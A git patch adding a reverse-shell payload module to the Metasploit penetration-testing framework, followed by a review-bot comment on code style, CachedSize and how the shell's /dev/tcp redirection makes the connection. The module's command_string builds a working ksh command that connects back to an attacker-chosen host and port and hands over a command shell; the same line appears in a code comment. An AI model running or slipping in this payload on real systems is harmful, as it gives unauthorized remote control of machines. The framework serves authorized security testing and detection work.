From 53844cb24a5174e8e11ef2e130c9f7e5cf5e1c56 Mon Sep 17 00:00:00 2001
From: WangYihang
Date: Tue, 15 May 2018 22:36:47 +0800
Subject: [PATCH] Add an reverse shell payload by ksh(the korn shell)
---
.../payloads/singles/cmd/unix/reverse_ksh.rb | 44 +++++++++++++++++++
1 file changed, 44 insertions(+)
create mode 100644 modules/payloads/singles/cmd/unix/reverse_ksh.rb
diff --git a/modules/payloads/singles/cmd/unix/reverse_ksh.rb b/modules/payloads/singles/cmd/unix/reverse_ksh.rb
new file mode 100644
index 0000000000..f65e5b6669
--- /dev/null
+++ b/modules/payloads/singles/cmd/unix/reverse_ksh.rb
@@ -0,0 +1,44 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/handler/reverse_tcp'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module MetasploitModule
+
+ CachedSize = 110
+
+ include Msf::Payload::Single
+ include Msf::Sessions::CommandShellOptions
+
+ def initialize(info = {})
+ super(merge_info(info,
+ 'Name' => 'Unix Command Shell, Reverse TCP (via Ksh)',
+ 'Description' => %q{
+ Connect back and create a command shell via Ksh. Note: Although Ksh is often
+ available, please be aware it isn't usually installed by default.
+ },
+ 'Author' => 'Wang Yihang ',
+ 'License' => MSF_LICENSE,
+ 'Platform' => 'unix',
+ 'Arch' => ARCH_CMD,
+ 'Handler' => Msf::Handler::ReverseTcp,
+ 'Session' => Msf::Sessions::CommandShell,
+ 'PayloadType' => 'cmd',
+ 'RequiredCmd' => 'ksh',
+ 'Payload' => { 'Offsets' => {}, 'Payload' => '' }
+ ))
+ end
+
+ def generate
+ return super + command_string
+ end
+
+ def command_string
+ # ksh -c 'ksh >/dev/tcp/${HOST}/${PORT} <&1'
+ cmd = "ksh -c 'ksh >/dev/tcp/#{datastore['LHOST']}/#{datastore['LPORT']} <&1'"
+ end
+end
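Review bot: `command_string` binds the command to a local `cmd` that is never read, so the method returns the right value only because an assignment evaluates to its right-hand side. Return the interpolated string directly, and write `generate` as `super + command_string` without the explicit `return`. The comment above the assignment only repeats the string; a why-comment such as `# stdout goes to a TCP socket opened by ksh's own /dev/tcp redirection; stdin is duplicated from it (<&1)` would tell maintainers and detection authors that the shell itself makes the connection, with no separate network utility in the process tree. `CachedSize = 110` looks larger than the string built here for typical LHOST/LPORT values, assuming `super` contributes nothing given the empty `'Payload'` entry, so it is worth regenerating it with the framework's cached-size tooling instead of setting it by hand.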